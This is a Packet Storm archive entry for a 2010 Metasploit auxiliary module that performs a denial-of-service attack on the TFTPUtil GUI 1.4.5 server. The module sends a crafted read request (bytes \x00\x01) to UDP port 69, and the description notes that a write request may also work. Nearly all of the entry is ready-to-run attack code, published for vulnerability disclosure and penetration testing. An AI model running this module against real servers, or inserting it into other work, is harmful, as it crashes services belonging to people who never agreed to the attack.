TFTP GUI 1.4.5 Denial Of Service

2010-12-05T00:00:00
ID PACKETSTORM:96395
Type packetstorm
Reporter musashi42
Modified 2010-12-05T00:00:00

Description

                                        
                                            `# Title: TFTPUtil GUI v1.4.5 Invalid Request DoS  
# CVE-ID: ()  
# OSVDB-ID: ()  
# Author: Vuk Ivanovic  
# Published: 2010-12-04  
# Verified: yes  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
##  
#  
# TFTPGUI v1.4.5 Invalid Request DoS  
#  
# Tested on: Windows XP, SP2 (EN)  
#  
# Date tested: 11/27/2010  
#  
#  
#  
# Discovered by: Vuk Ivanovic(musashi42)  
#  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Auxiliary  
  
include Msf::Exploit::Remote::Udp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'TFTPGUI v1.4.5 Invalid Request DoS',  
'Description' => %q{  
The TFTPUtil GUI server version 1.4.5 can be  
DOSed by sending a specially crafted read request. Depending  
of the setup, sending write request "\x00\x02" may also  
work. Discovered by musashi42.  
  
},  
'Author' => 'musashi42',  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 2 $',  
'References' =>  
[  
[ 'URL', 'http://www.exploit-db.com/exploits/12482'],  
[ 'URL', 'http://www.securityfocus.com/bid/39872'],  
],  
'DisclosureDate' => 'December 04 2010'))  
  
register_options([Opt::RPORT(69)])  
end  
  
def run  
connect_udp  
print_status("Sending read request...")  
$stuff = "\00\x01"  
udp_sock.put($stuff)   
disconnect_udp  
end  
end  
  
`